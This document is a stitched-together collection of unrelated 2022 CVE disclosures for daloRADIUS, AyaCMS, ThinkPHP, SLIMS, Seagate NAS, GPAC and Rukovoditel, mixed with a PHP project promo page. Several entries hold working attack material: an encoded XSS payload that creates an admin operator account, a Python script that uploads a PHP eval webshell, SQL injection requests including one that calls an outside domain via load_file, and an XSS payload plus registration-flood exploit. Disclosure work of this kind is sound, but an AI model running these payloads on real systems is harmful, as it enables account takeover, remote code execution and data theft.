daloRADIUS is an open source RADIUS web management application. daloRadius 1.3 and prior are vulnerable to a combination cross site scripting (XSS) and cross site request forgery (CSRF) vulnerability which leads to account takeover in the mng-del.php file because of an unescaped variable reflected in the DOM on line 116. This issue has been addressed in commit `ec3b4a419e`. Users are advised to manually apply the commit in order to mitigate this issue. Users may also mitigate this issue with in two parts 1) The CSRF vulnerability can be mitigated by making the daloRadius session cookie to samesite=Lax or by the implimentation of a CSRF token in all forms. 2) The XSS vulnerability may be mitigated by escaping it or by introducing a Content-Security policy.

**Platform** : daloRadius

**Repository** : daloRadius github

**Vulnerability** : XSS+CSRF to create a new _admin/operator_ account

****Description****

daloRadius 1.3 was vulnerable to XXS+CSRF to account takeover in the mng-del.php file because of an unescaped variable reflected in the DOM on line 116. I reported this vulnerability last week to all the maintainers of this repository and it was later found out by @filippolauria, the maintainer of this repository that this bug is not only found in line 116 but on a lot of other parts in the code, thanks to him for the quick and amazing patches.

****Steps to Reproduce****

1.  The vulnerabilitiy lies in the /mng-del.php file
2.  we can send a request like the following http://<domain>/mng-del.php?username[]=a&username[]=%3C%2Ftd%3E%3Cimg+src+onerror%3D%22alert(document.domain)%22%3E  to pop a simple alert box.
3.  You can use the following payload to create a new operator account
4.  There are multiple forms which are vulnerable to CSRF

    Payload: http://<domain>/mng-del.php?username[]=a&username[]=%3C%2Ftd%3E%3Cimg%20src%20onerror%3D%22fetch(%27http%3A%2F%2F<domain>%2Fconfig-operators-new.php%27%2C%7Bmethod%3A%27POST%27%2Cheaders%3A%7B%27Content-Type%27%3A%20%27application%2Fx-www-form-urlencoded%27%2C%7D%2Cbody%3A%27operator_username%3Dhacked%26operator_password%3Dhacked%26submit%3DApply%26firstname%3D%26lastname%3D%26title%3D%26department%3D%26company%3D%26phone1%3D%26phone2%3D%26email1%3D%26email2%3D%26messenger1%3D%26messenger2%3D%26notes%3D%26ACL_acct_custom_query%3D1%26ACL_acct_all%3D1%26ACL_acct_username%3D1%26ACL_acct_nasipaddress%3D1%26ACL_acct_active%3D1%26ACL_acct_ipaddress%3D1%26ACL_acct_date%3D1%26ACL_acct_hotspot_compare%3D1%26ACL_acct_hotspot_accounting%3D1%26ACL_acct_maintenance_delete%3D1%26ACL_acct_maintenance_cleanup%3D1%26ACL_acct_plans_usage%3D1%26ACL_bill_history_query%3D1%26ACL_bill_invoice_new%3D1%26ACL_bill_invoice_del%3D1%26ACL_bill_invoice_report%3D1%26ACL_bill_invoice_list%3D1%26ACL_bill_invoice_edit%3D1%26ACL_bill_merchant_transactions%3D1%26ACL_bill_payment_types_edit%3D1%26ACL_bill_payment_types_del%3D1%26ACL_bill_payment_types_new%3D1%26ACL_bill_payment_types_list%3D1%26ACL_bill_payments_list%3D1%26ACL_bill_payments_new%3D1%26ACL_bill_payments_edit%3D1%26ACL_bill_payments_del%3D1%26ACL_bill_plans_del%3D1%26ACL_bill_plans_new%3D1%26ACL_bill_plans_list%3D1%26ACL_bill_plans_edit%3D1%26ACL_bill_pos_list%3D1%26ACL_bill_pos_edit%3D1%26ACL_bill_pos_del%3D1%26ACL_bill_pos_new%3D1%26ACL_bill_rates_new%3D1%26ACL_bill_rates_del%3D1%26ACL_bill_rates_date%3D1%26ACL_bill_rates_list%3D1%26ACL_bill_rates_edit%3D1%26ACL_config_backup_managebackups%3D1%26ACL_config_backup_createbackups%3D1%26ACL_config_interface%3D1%26ACL_config_user%3D1%26ACL_config_lang%3D1%26ACL_config_logging%3D1%26ACL_graphs_overall_upload%3D1%26ACL_graphs_overall_download%3D1%26ACL_graphs_alltime_traffic_compare%3D1%26ACL_mng_rad_attributes_list%3D1%26ACL_mng_rad_attributes_del%3D1%26ACL_mng_rad_attributes_search%3D1%26ACL_mng_rad_attributes_import%3D1%26ACL_mng_rad_attributes_edit%3D1%26ACL_mng_rad_attributes_new%3D1%26ACL_mng_batch_add%3D1%26ACL_mng_batch_del%3D1%26ACL_mng_batch_list%3D1%26ACL_mng_rad_groupreply_search%3D1%26ACL_mng_rad_groupreply_edit%3D1%26ACL_mng_rad_groupcheck_list%3D1%26ACL_mng_rad_groupreply_del%3D1%26ACL_mng_rad_groupcheck_del%3D1%26ACL_mng_rad_groupcheck_new%3D1%26ACL_mng_rad_groupreply_list%3D1%26ACL_mng_rad_groupcheck_search%3D1%26ACL_mng_rad_groupcheck_edit%3D1%26ACL_mng_rad_groupreply_new%3D1%26ACL_mng_hs_edit%3D1%26ACL_mng_hs_del%3D1%26ACL_mng_hs_list%3D1%26ACL_mng_hs_new%3D1%26ACL_mng_rad_hunt_edit%3D1%26ACL_mng_rad_hunt_new%3D1%26ACL_mng_rad_hunt_del%3D1%26ACL_mng_rad_hunt_list%3D1%26ACL_mng_rad_ippool_new%3D1%26ACL_mng_rad_ippool_list%3D1%26ACL_mng_rad_ippool_del%3D1%26ACL_mng_rad_ippool_edit%3D1%26ACL_mng_rad_nas_edit%3D1%26ACL_mng_rad_nas_del%3D1%26ACL_mng_rad_nas_list%3D1%26ACL_mng_rad_nas_new%3D1%26ACL_mng_rad_profiles_duplicate%3D1%26ACL_mng_rad_profiles_edit%3D1%26ACL_mng_rad_profiles_new%3D1%26ACL_mng_rad_profiles_list%3D1%26ACL_mng_rad_profiles_del%3D1%26ACL_mng_rad_proxys_new%3D1%26ACL_mng_rad_proxys_list%3D1%26ACL_mng_rad_proxys_del%3D1%26ACL_mng_rad_proxys_edit%3D1%26ACL_mng_rad_realms_new%3D1%26ACL_mng_rad_realms_list%3D1%26ACL_mng_rad_realms_del%3D1%26ACL_mng_rad_realms_edit%3D1%26ACL_mng_rad_usergroup_edit%3D1%26ACL_mng_rad_usergroup_del%3D1%26ACL_mng_rad_usergroup_list%3D1%26ACL_mng_rad_usergroup_list_user%3D1%26ACL_mng_rad_usergroup_new%3D1%26ACL_mng_new%3D1%26ACL_mng_batch%3D1%26ACL_mng_new_quick%3D1%26ACL_mng_del%3D1%26ACL_mng_import_users%3D1%26ACL_mng_edit%3D1%26ACL_mng_list_all%3D1%26ACL_mng_search%3D1%26ACL_rep_newusers%3D1%26ACL_rep_lastconnect%3D1%26ACL_rep_history%3D1%26ACL_rep_online%3D1%26ACL_rep_topusers%3D1%26ACL_rep_logs_radius%3D1%26ACL_rep_logs_system%3D1%26ACL_rep_logs_boot%3D1%26ACL_rep_logs_daloradius%3D1%26ACL_rep_stat_server%3D1%26ACL_rep_stat_raid%3D1%26ACL_rep_stat_services%3D1%26ACL_rep_stat_ups%3D1%26ACL_rep_stat_cron%3D1%27%2C%7D).then(r%3D%3Er.text()).then(r%3D%3Ealert(r))%22%3E
    

****Severity****

daloRadius is used by a number of organizations for managing Hotspots and general-purpose ISP deployments. An attacker can create an admin/operator account using one click and take over the network of the organization. An attacker will be able to create new user accounts and delete existing ones and change network configurations.

****Mitigation****

1.  The CSRF vulnerability can be mitigated by making the daloRadius session cookie to samesite=Lax or by the implimentation of a CSRF token in all forms
2.  We can prevent the XSS by escaping it or by introducing a Content-Security policy

CVE-2022-23475: dalorRadius XXS+CSRF to Full Account Take over

AutoTaxi Stand Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component search.php.

**Auto/Taxi Stand Management System using PHP and MySQL**

“Auto/Taxi Stand Management System” is a web-based technology that will manage the records of the incoming and outgoing autos and taxis in a parking stand. It’s an easy for Admin to retrieve the data if the auto and taxi has been visited through the number he can get that data“Auto/Taxi Stand Management Project in PHP”  is an automatic system that delivers data processing in very high speed in a systematic manner.

**Project Requirements**

Project Name

Auto/Taxi Stand Management System Project (Using PHP & MYSQLi)

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In “Auto/Taxi Stand Management System project”  we use PHP and MySQL database. This is the project which keeps records of the auto and taxi which is going to park in the stand. “Auto/Taxi Stand Management System”  have module i.e., admin and user.

**User**

User can only view the Auto/Taxi stand recipient by using their name and mobile number. number.

**Admin**

**Dashboard**: In this sections, the admin can briefly view the number of auto and taxi entries in a particular period.

**New Auto/Taxi Entry**: In this section, admin add auto and taxi which is going into the stand.

**Manage Auto/Taxi Entry**: In this section, admin can manage incoming and outgoing auto and taxi and the admin can also add parking charges and his/her remarks.

**Reports**: In this section admin can generate auto and taxi entry reports between two dates.

Admin can also update his profile, change the password and recover the password.

****Some of the Project Screens****

**Admin Login**

**Admin Dashboard**

**Auto/Taxi Stand Entry Form**

**Auto/Taxi Stand Receipt**

**How to run the Auto/Taxi Stand Management System Project Using PHP and M**ySQL****

1\. Download the zip file

2\. Extract the file and copy atsms  folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/HTML)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name atsmsdb

6\. Import atsmsdb.sql file(given inside the zip package in the SQL file folder)

7\. Run the script http://localhost/atsms

**Credential for admin panel :**  
Username: admin  
Password: Test@123

**View Demo**

**Download Project Source Code**

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-43369: Auto/Taxi Stand Management System Project in PHP | Auto Stand Management Project

AyaCMS v3.1.2 has an Arbitrary File Upload vulnerability.

Register a frontend user and login to get the cookie, then upload our webshell.

    import requests
    
    files = {
        'Filedata': ('shell.php', '<?php @eval($_POST[2333]);')
    }
    cookies = {
        'aya_auth': 'UmMGDhI2GypYeUw1XApRO1dkEiEFN1UwTCcGOhZxVjxbOwRhCWwTf0ErTSNJLl9mRCMQcAMzXjlBLgY7DGtFKFJnBjcSJBt2WGlMc1w3',
        'aya_template': 'pc'
    }
    url = 'http://localhost/AyaCMS/ajax.php?fun=upload_file'
    r = requests.post(url=url, files=files, cookies=cookies)
    print(r.text)
    

We will get a webshell.

CVE-2022-45548: AyaCMS v3.1.2 has a Frontend Arbitrary File Upload Vulnerability  · Issue #4 · loadream/AyaCMS

Thinkphp 5.1.41 and 5.0.24 has a code logic error which causes file upload getshell.

**Thinkphp has a code logic error**

Moderate severity GitHub Reviewed Published Dec 6, 2022 • Updated Dec 6, 2022

GHSA-59fh-rjq3-xq7j: Thinkphp has a code logic error

**Code logic error causes file upload getshell**  
Verify version:Thinkphp5.1.41/Thinkphp5.0.24  
Install:composer create-project topthink/think tp 5.xxx

test version:Thinkphp5.1.41  
If the user directly uses the move method of thinkphp  
like this：Add an upload controller like the official documentation:https://www.kancloud.cn/manual/thinkphp5\_1/354121

<?php
namespace app\\index\\controller;

class Upload 
{
    public function index(){
        // 获取表单上传文件 例如上传了001.jpg
        $file = request()->file('image');
        // 移动到框架网站目录/uploads/ 目录下
        $info = $file\->move( './uploads');
        if($info){
            // 成功上传后 获取上传信息
            // 输出 jpg
            echo $info\->getExtension();
            // 输出 20160820/42a79759f284b767dfcb2a0197904287.jpg
            echo $info\->getSaveName();
            // 输出 42a79759f284b767dfcb2a0197904287.jpg
            echo $info\->getFilename(); 
        }else{
            // 上传失败获取错误信息
            echo $file\->getError();
        }
    }

}

Will cause the file with the suffix php to be uploaded directly  
Because in thinkphp\library\think\File.php line 272 it is allowed

public function checkImg()
    {
        $extension = strtolower(pathinfo($this\->getInfo('name'), PATHINFO\_EXTENSION));

        /\* 对图像文件进行严格检测 \*/
        if (in\_array($extension, \['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf'\]) && !in\_array($this\->getImageType($this\->filename), \[1, 2, 3, 4, 6, 13\])) {
            $this\->error = 'illegal image files';
            return false;
        }

        return true;
    }

I think the problem is that true and false are written in reverse. And !in\_array getImageType

The logic should be?

public function checkImg()
    {
        $extension = strtolower(pathinfo($this\->getInfo('name'), PATHINFO\_EXTENSION));

        /\* 对图像文件进行严格检测 \*/
        if (in\_array($extension, \['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf'\]) && in\_array($this\->getImageType($this\->filename), \[1, 2, 3, 4, 6, 13\])) {
            return true;
        }

        return false;
    }

CVE-2022-44289: Code logic error causes file upload getshell · Issue #2772 · top-think/framework

Senayan Library Management System version 9.5.1 suffers from a remote SQL injection vulnerability.

## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 12.06.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.5.1/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1## Description:The manual insertion `point 4` appears to be vulnerable to SQLinjection attacks.The payload '+(selectload_file('\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\ejf'))+'was submitted in the manual insertion `point 4` testing.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can execute a very dangerous `subquery` to view verysensitive information.## STATUS: HIGH Vulnerability[+] Payload:```MySQLGET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaaHTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1;SenayanMember=schm4nbtgbb5i1tbeonr6cav3uConnection: close```[+] Response:```MySQLHTTP/1.1 200 OKDate: Tue, 06 Dec 2022 13:51:38 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockContent-Length: 4120Connection: closeContent-Type: text/html; charset=UTF-8<!doctype html><html><head><title>Loan Report by Class Report</title>    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/css/bootstrap.min.css"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/admin/admin_template/default/style.css?31085233"/>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/jquery.js"></script>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/gui.js"></script></head><body><div id="pageContent">  <div class="mb-2">Loan Recap By Class<strong>bbbb'+(select*from(select(sleep(5)))a)+'</strong> for year<strong>2002</strong> <a class="s-btn btn btn-default printReport"onclick="window.print()" href="#">Print Current Page</a><ahref="../xlsoutput.php" class="s-btn btn btn-default"target="_BLANK">Export to spreadsheet format</a>    <a class="s-btn btn btn-info notAJAX openPopUp"href="/slims9_bulian-9.5.1/admin/modules/reporting/pop_chart.php"width="700" height="530" title="Loan Recap By Class">Show inchart/plot</a></div><table class="s-table table table-sm table-bordered"><tr><thclass="dataListHeaderPrinted">Classification</th><thclass="dataListHeaderPrinted">Jan</th><thclass="dataListHeaderPrinted">Feb</th><thclass="dataListHeaderPrinted">Mar</th><thclass="dataListHeaderPrinted">Apr</th><thclass="dataListHeaderPrinted">May</th><thclass="dataListHeaderPrinted">Jun</th><thclass="dataListHeaderPrinted">Jul</th><thclass="dataListHeaderPrinted">Aug</th><thclass="dataListHeaderPrinted">Sep</th><thclass="dataListHeaderPrinted">Oct</th><thclass="dataListHeaderPrinted">Nov</th><thclass="dataListHeaderPrinted">Dec</th></tr><tr><td><strong>bbbb'+(select*from(select(sleep(5)))a)+'00</strong></td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'00</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'10</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'20</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'30</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'40</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'50</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'60</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'70</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'80</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'90</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td></table></div><div class="loader"></div><script type="text/javascript">    // if we are inside iframe    jQuery(document).ready(function () {          });</script></body></html>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1)## Proof and Exploit:[href](https://streamable.com/gthu91)## Time spent`04:00:00`

Senayan Library Management System 9.5.1 SQL Injection

The web-management application on Seagate Central NAS STCG2000300, STCG3000300, and STCG4000300 devices allows OS command injection via mv_backend_launch in cirrus/application/helpers/mv_backend_helper.php by leveraging the "start" state and sending a check_device_name request.

CVE-2020-6627

GPAC MP4box v2.0.0 was discovered to contain a stack overflow in the smil_parse_time_list parameter at /scenegraph/svg_attributes.c.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

A fixed length buffer value\_string is allocated in smil\_parse\_time\_list, while in the later memcpy, it doesn't check the length and simply copy content to this buffer, causing overflow.

static void smil\_parse\_time\_list(GF\_Node \*e, GF\_List \*values, char \*begin\_or\_end\_list)
{
	SMIL\_Time \*value;
	char value\_string\[500\];
	char \*str = begin\_or\_end\_list, \*tmp;
	u32 len;

	/\* get rid of leading spaces \*/
	while (\*str == ' ') str++;

	while (1) {
		tmp = strchr(str, ';');
		if (tmp) len = (u32) (tmp-str);
		else len = (u32) strlen(str);
		memcpy(value\_string, str, len);
		while ((len > 0) && (value\_string\[len - 1\] == ' '))

**Impact**

Since the content is absolutely controllable by users, an unlimited length will cause stack overflow, corrupting canary, causing DoS or even Remote Code Execution.

**Mitigation**

We can just set a length limit to it, making it less than 500 byte.

**Reproduce**

On Ubuntu 22.04 lts, make with this.

    ./configure --static-bin
    make
    

Run the following command with POC.svg.

    MP4Box -mp4 -sync 0x1000 ./POC.svg
    

You may get a buffer overflow detected error.

    [Parser] SVG Scene Parsing: ../encode_2-gpac-2.0.0/out/default/crashes/0.svg
    *** buffer overflow detected ***: terminated               | (00/100)
    Aborted
    

GDB info before crash

    ─────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────
     RAX  0x6804
     RBX  0x0
     RCX  0x1f4
     RDX  0x6804
    *RDI  0x7fffffff6640 ◂— 0x0
     RSI  0xda20cc ◂— 0xff22802d68353548
     R8   0x0
     R9   0xda08b0 ◂— 0x0
     R10  0xda2050 ◂— 0x1790
     R11  0xd80c00 (main_arena+96) —▸ 0xdabcf0 ◂— 0x0
     R12  0xda08b0 ◂— 0x0
     R13  0x7fffffff6640 ◂— 0x0
     R14  0xda20cc ◂— 0xff22802d68353548
     R15  0xb650c3 ◂— 'wallclock('
     RBP  0x6804
     RSP  0x7fffffff6600 ◂— 0x0
    *RIP  0x4c756b (smil_parse_time_list+123) ◂— call   0xadfe30
    ──────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────
       0x4c77e2 <smil_parse_time_list+754>    jmp    smil_parse_time_list+110                      <smil_parse_time_list+110>
        ↓
       0x4c755e <smil_parse_time_list+110>    mov    edx, ebp
       0x4c7560 <smil_parse_time_list+112>    mov    ecx, 0x1f4
       0x4c7565 <smil_parse_time_list+117>    mov    rsi, r14
       0x4c7568 <smil_parse_time_list+120>    mov    rdi, r13
     ► 0x4c756b <smil_parse_time_list+123>    call   __memcpy_chk                      <__memcpy_chk>
            dstpp: 0x7fffffff6640 ◂— 0x0
            srcpp: 0xda20cc ◂— 0xff22802d68353548
            len: 0x6804
            dstlen: 0x1f4
    

Backtrace

    pwndbg> bt
    #0  0x0000000000a84c3c in pthread_kill ()
    #1  0x0000000000a640d6 in raise ()
    #2  0x0000000000402136 in abort ()
    #3  0x0000000000a7b476 in __libc_message ()
    #4  0x0000000000adfe2a in __fortify_fail ()
    #5  0x0000000000adfc46 in __chk_fail ()
    #6  0x00000000004c7570 in smil_parse_time_list ()
    #7  0x00000000004c965b in gf_svg_parse_attribute ()
    #8  0x000000000063d178 in svg_node_start ()
    #9  0x0000000000463486 in xml_sax_node_start ()
    #10 0x0000000000464629 in xml_sax_parse ()
    #11 0x0000000000464e63 in xml_sax_read_file.part ()
    #12 0x000000000046515e in gf_xml_sax_parse_file ()
    #13 0x000000000063b80a in load_svg_run ()
    #14 0x000000000042a5e8 in EncodeFile ()
    #15 0x000000000041252c in mp4boxMain ()
    #16 0x0000000000a598fa in __libc_start_call_main ()
    #17 0x0000000000a5b157 in __libc_start_main_impl ()
    #18 0x0000000000402b95 in _start ()
    

**Credit**

xdchase

**POC**

POC-bof.zip

CVE-2022-45283: GPAC-2.0.0 MP4Box: stack overflow with unlimited length and controllable content in smil_parse_time_list · Issue #2295 · gpac/gpac

Rukovoditel v3.2.1 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability in the component /rukovoditel/index.php?module=users/login. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

**Vendor**

**Description:**

The application is vulnerable to DOM-based cross-site scripting attacks. Data is read from location.hash and passed to jQuery.parseHTML. The registration function is not sanitizing well the hash gy651j5d1skektlts3g10ddvz6scjtas6mwi09hz6 from <a style="float: right" class="btn btn-info btn-registration" href="http://pwnedhost.com/rukovoditel/index.php?module=users/registration">gy651j5d1skektlts3g10ddvz6scjtas6mwi09hz6</a> was submited in GET request. The attacker can use this vulnerability to create an unlimited number of accounts on this system until it crashed.

**STATUS: HIGH Vulnerability - CRITICAL**

\[+\] Request:

    GET /rukovoditel/index.php?module=users/login HTTP/1.1
    Host: pwnedhost.com
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: cookie_test=please_accept_for_session; sid=2di7vn24tfnntmif91itsspf79
    Connection: close
    

\[+\] Response location.hash:

    <form action="http://pwnedhost.com/rukovoditel/index.php?module=users/login&action=login"  name="login_form" id="login_form" method="post" class="login-form"> <input  name="form_session_token" id="form_session_token" value="ChctFpqE22" type="hidden">
        <div class="form-group">
            
            <label class="control-label visible-ie8 visible-ie9">Username</label>
            <div class="input-icon">
                <i class="fa fa-user"></i>
                <input class="form-control placeholder-no-fix required" type="text" autocomplete="off" placeholder="Username" name="username"/>
            </div>
        </div>
        <div class="form-group">
            <label class="control-label visible-ie8 visible-ie9">Password</label>
            <div class="input-icon">
                <i class="fa fa-lock"></i>
                <input class="form-control placeholder-no-fix required"  type="password" autocomplete="off" placeholder="Password" name="password"/>
            </div>
        </div>
    
            
        <div class="form-actions">
                        <label class="checkbox"> <input  name="remember_me" id="remember_me" value="1" type="checkbox"> Remember Me</label>
            
            <button type="submit" class="btn btn-info pull-right">Login</button>
        </div>
    
        </form>
    
        <div class="forget-password">	
            <a style="float: right" class="btn btn-info btn-registration" href="http://pwnedhost.com/rukovoditel/index.php?module=users/registration">xovnabtd3t6fmsfirnuwpe0gn4ga7rxusvipagr6g</a>        <p><a href="http://pwnedhost.com/rukovoditel/index.php?module=users/restore_password">Password forgotten?</a></p>
        </div>
    

\[+\] Payload:

    GET /rukovoditel/index.php?module=dashboard/check_project_version&12958%22%3balert(Hello_from_nu11secur1ty)%2f%2f807=1 HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: sid=me62gha57kek97j4m651jtuan8; cookie_test=please_accept_for_session; app_login_redirect_to=module%3Ddashboard%2F; app_remember_me=1; app_stay_logged=1; app_remember_user=YWRtaW4%3D; app_remember_pass=JFAkRUo2eU9wSWYuU095MWIyV0hQQWg2SjdoSS90ejhLMQ%3D%3D
    X-Requested-With: XMLHttpRequest
    Referer: http://pwnedhost.com/rukovoditel/index.php?module=dashboard/
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    
    

\[+\]Exploit:

    POST /rukovoditel/index.php?module=users/registration&action=save HTTP/1.1
    Host: pwnedhost.com
    Content-Length: 971
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://pwnedhost.com
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPtmHRBVsASEoZQx1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/registration
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: cookie_test=please_accept_for_session; sid=rcktjdlje3102291rfbvs19otn
    Connection: close
    
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="form_session_token"
    
    FXvkuHKIrc
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[6]"
    
    4
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[12]"
    
    k1
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="password"
    
    password
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[7]"
    
    k1
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[8]"
    
    k1nov
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[9]"
    
    k1@k.com
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="fields[13]"
    
    english.php
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1
    Content-Disposition: form-data; name="user_agreement"
    
    1
    ------WebKitFormBoundaryPtmHRBVsASEoZQx1--
    

**Reproduce:**

href

**Proof and Exploit:**

href

**Time spent**

3:45

CVE-2022-45020: CVE-nu11secur1ty/vendors/rukovoditel.net/2022/rukovoditel-3.2.1 at main · nu11secur1ty/CVE-nu11secur1ty

